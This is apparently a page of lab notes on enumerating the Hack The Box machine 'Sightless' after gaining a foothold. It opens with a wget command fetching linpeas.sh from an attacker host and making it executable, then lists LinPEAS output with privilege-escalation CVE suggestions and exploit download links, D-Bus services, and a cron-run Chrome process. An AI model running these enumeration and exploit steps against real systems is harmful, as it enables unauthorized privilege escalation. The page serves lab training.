PEAS

Conducting an automated enumeration after performing a basic system enumeration

michael@sightless:/var/tmp$ wget -q http://10.10.15.34/linpeas.sh ; chmod 755 ./linpeas.sh

Delivery complete

Executing PEAS

CVEs

╔══════════╣ Searching Signature verification failed in dmesg
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#dmesg-signature-verification-failed
dmesg Not Found
 
╔══════════╣ Executing Linux Exploit Suggester
╚ https://github.com/mzet-/linux-exploit-suggester
[+] [CVE-2022-0847] DirtyPipe
 
   Details: https://dirtypipe.cm4all.com/
   Exposure: less probable
   Tags: ubuntu=(20.04|21.04),debian=11
   Download URL: https://haxx.in/files/dirtypipez.c
 
[+] [CVE-2021-4034] PwnKit
 
   Details: https://www.qualys.com/2022/01/25/cve-2021-4034/pwnkit.txt
   Exposure: less probable
   Tags: ubuntu=10|11|12|13|14|15|16|17|18|19|20|21,debian=7|8|9|10|11,fedora,manjaro
   Download URL: https://codeload.github.com/berdav/CVE-2021-4034/zip/main
 
[+] [CVE-2021-3156] sudo Baron Samedit
 
   Details: https://www.qualys.com/2021/01/26/cve-2021-3156/baron-samedit-heap-based-overflow-sudo.txt
   Exposure: less probable
   Tags: mint=19,ubuntu=18|20, debian=10
   Download URL: https://codeload.github.com/blasty/CVE-2021-3156/zip/main
 
[+] [CVE-2021-3156] sudo Baron Samedit 2
 
   Details: https://www.qualys.com/2021/01/26/cve-2021-3156/baron-samedit-heap-based-overflow-sudo.txt
   Exposure: less probable
   Tags: centos=6|7|8,ubuntu=14|16|17|18|19|20, debian=9|10
   Download URL: https://codeload.github.com/worawit/CVE-2021-3156/zip/main
 
[+] [CVE-2021-22555] Netfilter heap out-of-bounds write
 
   Details: https://google.github.io/security-research/pocs/linux/cve-2021-22555/writeup.html
   Exposure: less probable
   Tags: ubuntu=20.04{kernel:5.8.0-*}
   Download URL: https://raw.githubusercontent.com/google/security-research/master/pocs/linux/cve-2021-22555/exploit.c
   ext-url: https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-2021-22555/exploit.c
   Comments: ip_tables kernel module must be loaded
 
[+] [CVE-2017-5618] setuid screen v4.5.0 LPE
 
   Details: https://seclists.org/oss-sec/2017/q1/184
   Exposure: less probable
   Download URL: https://www.exploit-db.com/download/https://www.exploit-db.com/exploits/41154

Processes

There is a chrome browser running and initiated by a script; /home/john/automation/administration.py and it’s part of cronjob

Services

╔══════════╣ D-Bus Service Objects list
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#d-bus
NAME                             PID PROCESS         USER             CONNECTION    UNIT                        SESSION DESCRIPTION
:1.0                               1 systemd         root             :1.0          init.scope                  -       -
:1.1                             759 systemd-timesyn systemd-timesync :1.1          systemd-timesyncd.service   -       -
:1.2                             590 systemd-network systemd-network  :1.2          systemd-networkd.service    -       -
:1.20                           1543 chrome          john             :1.20         cron.service                -       -
:1.21                           1543 chrome          john             :1.21         cron.service                -       -
:1.24                           9855 upowerd         root             :1.24         upower.service              -       -
:1.3                             758 systemd-resolve systemd-resolve  :1.3          systemd-resolved.service    -       -
:1.35                         111901 systemd         michael          :1.35         user@1000.service           -       -
:1.4                             850 polkitd         root             :1.4          polkit.service              -       -
:1.43                         120523 busctl          michael          :1.43         session-1697.scope          1697    -
:1.5                             853 udisksd         root             :1.5          udisks2.service             -       -
:1.6                             852 systemd-logind  root             :1.6          systemd-logind.service      -       -
:1.7                             884 ModemManager    root             :1.7          ModemManager.service        -       -
:1.9                             848 networkd-dispat root             :1.9          networkd-dispatcher.service -       -
com.ubuntu.SoftwareProperties      - -               -                (activatable) -                           -       -
org.freedesktop.DBus               1 systemd         root             -             init.scope                  -       -
org.freedesktop.ModemManager1    884 ModemManager    root             :1.7          ModemManager.service        -       -
org.freedesktop.PackageKit         - -               -                (activatable) -                           -       -
org.freedesktop.PolicyKit1       850 polkitd         root             :1.4          polkit.service              -       -
org.freedesktop.UDisks2          853 udisksd         root             :1.5          udisks2.service             -       -
org.freedesktop.UPower          9855 upowerd         root             :1.24         upower.service              -       -
org.freedesktop.bolt               - -               -                (activatable) -                           -       -
org.freedesktop.fwupd              - -               -                (activatable) -                           -       -
org.freedesktop.hostname1          - -               -                (activatable) -                           -       -
org.freedesktop.locale1            - -               -                (activatable) -                           -       -
org.freedesktop.login1           852 systemd-logind  root             :1.6          systemd-logind.service      -       -
org.freedesktop.network1         590 systemd-network systemd-network  :1.2          systemd-networkd.service    -       -
org.freedesktop.resolve1         758 systemd-resolve systemd-resolve  :1.3          systemd-resolved.service    -       -
org.freedesktop.systemd1           1 systemd         root             :1.0          init.scope                  -       -
org.freedesktop.thermald           - -               -                (activatable) -                           -       -
org.freedesktop.timedate1          - -               -                (activatable) -                           -       -
org.freedesktop.timesync1        759 systemd-timesyn systemd-timesync :1.1          systemd-timesyncd.service   -       -

Network

Web

admin.sightless.htb

web1.sightless.htb

InfoSec LAB

Explorer

Sightless_Automated

PEAS

CVEs

Processes

Services

Network

Web

Interactive Graph View

Table of Contents

Backlinks